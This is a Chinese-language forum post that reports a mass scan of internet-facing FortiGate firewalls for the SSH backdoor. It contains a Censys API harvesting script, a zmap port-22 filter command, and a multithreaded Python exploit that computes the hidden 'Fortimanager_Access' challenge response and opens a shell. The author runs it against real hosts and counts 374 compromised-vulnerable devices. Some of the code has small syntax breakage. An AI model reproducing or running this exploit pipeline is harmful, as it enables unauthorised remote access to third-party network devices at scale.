飞塔SSH后门 4900台机器样本测试报告
测试逻过程1. Censys拉取数据通过censys拉去了50页面的结果通过
[*]
[*]443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate
关键字
使用官方的api进行拉取,脚本如下:
[*]
[*]import sys
[*]import json
[*]import requests
[*]
[*]API_URL = "https://www.censys.io/api/v1"
[*]UID = "0"
[*]SECRET = "0"
[*]
[*]def get(page):
[*] data = {
[*] "query":"443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate",
[*] "page":int(page),
[*] "fields":["ip"
[*] }
[*]
[*] res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET)).text
[*] #print res
[*] results = json.loads(res)
[*]
[*] for result in results["results"]:
[*] print "%s" % (result["ip"])
[*]for i in range(1,50):
[*] get(i)
2. 筛选出开放22端口的ip原始数据长度:
[*]
[*][root@xunzh 8]# cat ip.txt |wc
[*] 4900 4900 74466
[*][root@xunzh 8]#
通过zmap进行数据筛选
[*]
[*] zmap -p 22 --whitelist-file ip.txt -o out.txt
最终剩下
[*]
[*][root@xunzh 8]# cat out.txt |wc
[*] 1150 1150 16323
3. 对其进行扫描通过修改原始测试脚本进行测试,添加多线程模块
[*]
[*]#!/usr/bin/env python
[*]
[*]# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
[*]# Usage: ./fgt_ssh_backdoor.py <target-ip>
[*]import threading
[*]import Queue
[*]import socket
[*]import select
[*]import sys
[*]import paramiko
[*]from paramiko.py3compat import u
[*]import base64
[*]import hashlib
[*]import termios
[*]import tty
[*]
[*]def custom_handler(title, instructions, prompt_list):
[*] n = prompt_list[0][0
[*] m = hashlib.sha1()
[*] m.update('\x00' * 12)
[*] m.update(n + 'FGTAbc11*xy+Qqz27')
[*] m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
[*] h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
[*] return [h
[*]
[*]
[*]def main(ip):
[*] client = paramiko.SSHClient()
[*] client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
[*] try:
[*] client.connect(ip, username='', allow_agent=False, look_for_keys=False)
[*] except paramiko.ssh_exception.SSHException:
[*] pass
[*] trans = client.get_transport()
[*] try:
[*] trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
[*] except paramiko.ssh_exception.AuthenticationException:
[*] pass
[*] trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
[*] chan = client.invoke_shell()
[*]
[*] oldtty = termios.tcgetattr(sys.stdin)
[*] try:
[*] tty.setraw(sys.stdin.fileno())
[*] tty.setcbreak(sys.stdin.fileno())
[*] chan.settimeout(0.0)
[*]
[*] while True:
[*] r, w, e = select.select([chan, sys.stdin], [], [])
[*] if chan in r:
[*] try:
[*] x = u(chan.recv(1024))
[*] if len(x) == 0:
[*] sys.stdout.write('\r\n*** EOF\r\n')
[*] break
[*] print ip+" ok \n"
[*]
[*] break
[*] except socket.timeout:
[*] pass
[*]
[*] finally:
[*] termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
[*]ips=open(sys.argv[1]).read().replace('\r','').split('\n')
[*]q=Queue.Queue()
[*]for i in ips:
[*] q.put(ips)
[*]class mm(threading.Thread):
[*] def __init__(self,queue):
[*] threading.Thread.__init__(self)
[*] self.q=queue
[*] def run(self):
[*] while True:
[*] line=self.q.get()
[*] try:
[*] main(line)
[*] except:
[*] pass
[*]for i in xrange(10):
[*] mm(q).start()
使用方法:
[*]
[*]python scan.py input.txt
4. 总结扫描结果是存在374台漏洞机器,大约站了原始数据的13分之一1,如果按照这个数量来计算,全网大约有5000台以上机器收到影响,将漏洞主机标注在地图上,结果大致如下:
页:
[1]